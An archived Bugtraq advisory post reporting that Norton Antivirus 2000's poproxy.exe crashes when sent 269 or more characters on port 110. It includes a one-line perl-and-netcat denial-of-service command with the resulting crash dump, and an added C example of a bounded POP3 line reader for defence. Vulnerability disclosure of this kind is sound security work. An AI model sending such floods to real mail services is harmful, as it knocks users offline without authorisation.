Norton Antivirus 2000 Poproxy.exe problem

From: bugtraq@blue-ferret.com.au
Date: Thu May 24 2001 - 04:59:25 PDT


    Poproxy.exe is the email virus scanner included in Norton Antivirus 2000 (maybe
    other versions too). It listens on port 110 and acts as a mail server,
    retrieving your mail then scanning it, and passing it along to the mail client
    (I think).
    
    While messing around with this I crashed the server by sending it
    too many characters (269 or more). Once the program crashes the
    user is unable to receive email until the next reboot (or poproxy.exe is run
    again).
    
    Example:
    perl -e '{print "A"x269}' |nc 10.0.2.1 110
    
    where 10.0.2.1 is the Windows machine running poproxy.exe
    
    The output I got was:
    POPROXY caused an invalid page fault in module MFC42.DLL at 014f:5f490453.
    Registers:
    EAX=00000000 CS=014f EIP=5f490453 EFLGS=00010246
    EBX=00000000 SS=0157 ESP=02b1fc00 EBP=02b1fc14
    ECX=007c0f28 DS=0157 ESI=00000000 FS=381f
    EDX=00000000 ES=0157 EDI=007c0ef8 GS=1247
    Bytes at CS:EIP:
    89 7e 04 e8 ac 49 f8 ff 53 56 ff 76 04 e8 a7 48
    Stack dump:
    ffffffff 00000000 00000000 00a136b0 00000000 41414141 5f419f09 007c0ef8 00a11f20 007c0f60 00000001 5f419f09 00000009 0000010d 00000001 5f419e84
    
    
    Can anyone else confirm this?
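
For readers hardening a POP3 listener against the overlong input described in this message, the following is an added example (not part of the original post and not Symantec's code) of a bounded command-line reader that rejects an unterminated line instead of continuing to buffer it. The function and constant names are hypothetical; the 255-octet limit is the maximum POP3 command length given in RFC 2449.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* RFC 2449: a POP3 command line is at most 255 octets, CRLF included. */
#define POP3_MAX_LINE 255

enum pop3_status { POP3_OK = 0, POP3_NEED_MORE = 1, POP3_TOO_LONG = -1 };

/*
 * Hypothetical helper: take one CRLF-terminated command from `in` (the bytes
 * received so far) and copy it, CRLF stripped and NUL-terminated, into `out`.
 * On POP3_OK, *consumed is the number of input bytes that were used.
 */
enum pop3_status pop3_take_line(const char *in, size_t in_len,
                                char *out, size_t out_cap, size_t *consumed)
{
    /* Never scan past the protocol limit, however much data arrived. */
    size_t limit = in_len < POP3_MAX_LINE ? in_len : POP3_MAX_LINE;
    *consumed = 0;
    for (size_t i = 0; i + 1 < limit; i++) {
        if (in[i] == '\r' && in[i + 1] == '\n') {
            if (i + 1 > out_cap)          /* need i bytes plus the NUL */
                return POP3_TOO_LONG;
            memcpy(out, in, i);
            out[i] = '\0';
            *consumed = i + 2;
            return POP3_OK;
        }
    }
    /* Limit reached without a terminator: reject, do not keep buffering. */
    if (in_len >= POP3_MAX_LINE)
        return POP3_TOO_LONG;
    return POP3_NEED_MORE;
}

int main(void)
{
    char flood[269], out[POP3_MAX_LINE];
    size_t used;
    memset(flood, 'A', sizeof flood);     /* constructed input: 269 x 'A' */
    if (pop3_take_line(flood, sizeof flood, out, sizeof out, &used) == POP3_TOO_LONG)
        puts("-ERR line too long");       /* reply, then close the session */
    return 0;
}
```

A caller would answer `POP3_TOO_LONG` with an `-ERR` reply and drop the connection, so one client's bad input ends only that session.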
    



    This archive was generated by hypermail 2b30 : Thu May 24 2001 - 10:32:00 PDT